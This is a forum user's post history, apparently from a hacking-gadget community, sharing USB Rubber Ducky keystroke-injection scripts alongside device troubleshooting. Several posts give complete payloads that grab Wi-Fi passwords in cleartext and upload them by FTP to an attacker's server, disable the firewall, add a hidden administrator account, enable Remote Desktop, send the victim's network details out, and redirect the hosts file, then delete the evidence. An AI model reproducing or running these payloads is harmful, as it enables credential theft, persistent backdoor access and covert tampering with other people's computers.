Bucky67GTO
-
Posts
47 -
Joined
-
Last visited
-
Days Won
3
Posts posted by Bucky67GTO
-
-
Love it so far. cant wait to put through its paces. Thought about grabbing some of this through the registry, but this seems more straightforward.
-
I only have one profile on my box i was just asking so that i would know if it could or not. Thanks.
OK, thanks..It will definitely download all that are on the box. remember though, the more you have, the longer the delay you will need to ftp them.
-
alright. News? does it work as intended....issues?
-
Does anyone know how to make a new payload page on the USB Rubber Ducky Git Hub page? I keep trying to upload a couple of the payloads I made, and cant seem to figure out how it works.
Sure. Edit the page, copy one of the links and change it to what you want the payload to be named and paste it after the last item in the list. save it and it will turn red. click that link and it will prompt you to create the new page that it will link to. enjoy.
-
OK overwraith, really got me thinking and popped this one together and tested locally, not on another machine....yet...check out Remotely Possible. Thoughts?
-
OK all...Script for turning off the firewall, adding a user, making it an administrator, enabling remote access and sending (by FTP) the IP number to a server of your choice, then deleting the file. I am thinking something like netcat in the unix world? As always, Ideas?
DELAY 2000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 ALT y ENTER DELAY 400 STRING netsh firewall set opmode mode=disable ENTER DELAY 400 STRING net user /add username password ENTER DELAY 400 STRING net localgroup administrators username /add ENTER DELAY 400 STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f ENTER DELAY 400 STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f ENTER DELAY 400 STRING sc config TermService start= auto ENTER DELAY 400 STRING net start Termservice ENTER DELAY 400 STRING cd %USERPROFILE% ENTER DELAY 400 STRING ipconfig /all > number.txt ENTER DELAY 400 STRING ftp -i ftp server ENTER DELAY 400 STRING login name ENTER DELAY 400 STRING login password ENTER DELAY 600 STRING prompt ENTER DELAY 400 STRING prompt ENTER DELAY 400 STRING PUT number.txt ENTER DELAY 2000 STRING bye ENTER DELAY 400 STRING del number.txt ENTER DELAY 400 ALT SPACE STRING c
-
I have a couple of ideas. The duck would be a great delivery tool. Got a script for windows mostly written. should post in a day or two after I test.
Great question, really got me thinking.
-
Hello,
A great place to start is the Wiki - https://github.com/hak5darren/USB-Rubber-Ducky/wiki
this has payloads, tutorials (well one), software, etc.
you will need to have java loaded on your PC, and then get the encoder (i recommend ver 2.2). Once you have that, you can write your script and compile with the encoder.
Name your compiled script inject.bin, copy to the duck, test and enjoy.
-
is there a way to pull all the wireless profiles not the current one?
In the tests I did, it pulled all wireless connections, each having a separate .xml file. Not sure why you would only get one, unless there is only one. anyone have any ideas?
-
Thanks for the input. I was looking on the WIKI to find something that could manipulate the connection to the internet and did not find anything. Sorry I did not see the post earlier. I did not look within a posting for the rickroll.
What does CTRL+SHIFT+ENTER do? -> this opens the cmd window as the administrator, not sure that it works in XP, but I was focusing on Windows 7.
I really was just focusing on a quick way to manipulate the hosts file.
-
Time for round 2 - MissDirection - Edits the hosts file of the victim computer rerouting it to wherever you choose. you can add multiple lines, but this one should give you the idea. feedback is always appreciated. Also, be sure to use the 2.2 version of the encoder. Is it worth putting in the WIKI?
DELAY 2000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 STRING cd C:\Windows\System32\drivers\etc\ ENTER DELAY 400 STRING echo 64.149.122.94 www.test.com>>hosts ENTER DELAY 400 ALT SPACE STRING c
-
Can anyone give me feedback on if this fixed the encryption problem or if it works for them?
-
OK rebuild of my first script. It would not export cleartext passwords without administrator access, and the firewall was also giving me fits. sooooooo. the first ctrl-shift enter gets a cmd shell with administrative access (you need to compile with version 2.2 of duck encoder - props to Dnucna). the first string then disables the firewall, then the rest of the code works fine. You may want to tweek the delay after the ftp session depending on upload speed.....enjoy
Please let me know if you have ideas for additions/improvements.
DELAY 2000ESCAPECONTROL ESCAPEDELAY 400STRING cmdDELAY 400CTRL-SHIFT ENTERDELAY 400STRING netsh firewall set opmode mode=disableENTERDELAY 400STRING netsh wlan export profile key=clearENTERDELAY 400STRING cd %USERPROFILE%ENTERDELAY 400STRING ftp -i ftp serverENTERDELAY 400STRING usernameENTERDELAY 400STRING passwordENTERDELAY 600STRING promptENTERDELAY 400STRING promptENTERDELAY 400STRING MPUT *.xmlENTERDELAY 4000STRING byeENTERDELAY 400STRING del *.xmlENTERDELAY 200STRING netsh firewall set opmode mode=enableENTERDELAY 400ALT SPACESTRING c -
Sadly, it seems you are correct. I ran on my machine and got unfiltered. ran on a client and came up encrypted. Not sure the user i tested on was an administrator of the machine, I know I am. Wondering if that is the issue?
-
I received a bad Micro card as well, but it seems like more of a hassle to return than to spend a couple of bucks on a new one. the smaller they are the less they cost, and they really do not need to be very big as the payloads are tiny.
-
Has anyone used it yet? How does it work for you? Ideas for improvement?
-
Nevermind.....completed
-
OK, had some fun with the Duck, now I am playing with my new pineapple IV. Got in once, played a bit and chaged the SSID, but nothin else other than downloading some of the attacks. Now I can not log in with root and default. It seems to be functioning. I can ping the interfaces and even seems to be accepting connections on the new ssid. How can I reset this darn thing?
-
Added to Wiki.
-
For windows 7....This script will export the wifi settings then send to an ftp server of your choice. the cool part is that the security is exported in clear text. For pentesting this is fantastic. After sending the file it will delete the exports from the sending directory. Thoughts? I know I can play with the delays a bit, but works in under a minute.
DELAY 2000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
ENTER
DELAY 400
STRING netsh wlan export profile key=clear
ENTER
DELAY 400
STRING cd %USERPROFILE%
ENTER
DELAY 400
STRING ftp -i FTPSERVER
ENTER
DELAY 400
STRING LOGIN NAME
ENTER
DELAY 400
STRING LOGIN PASSWORD
ENTER
DELAY 600
STRING prompt
ENTER
DELAY 400
STRING prompt
ENTER
DELAY 400
STRING MPUT *.xml
ENTER
DELAY 2000
STRING bye
ENTER
DELAY 400
STRING del *.xml
ENTER
DELAY 200
ALT SPACE
STRING c
WiFi Manager
in Mark IV Infusions
Posted · Edited by Bucky67GTO
For recovering the hardware adapters, re-flashing did not work.
What did work was resetting to factory and reinstalling the manager.
Took me a whopping 10 minutes to reinstall all the infusions.
By the way, thanks Whistle Master....fantastic infusions.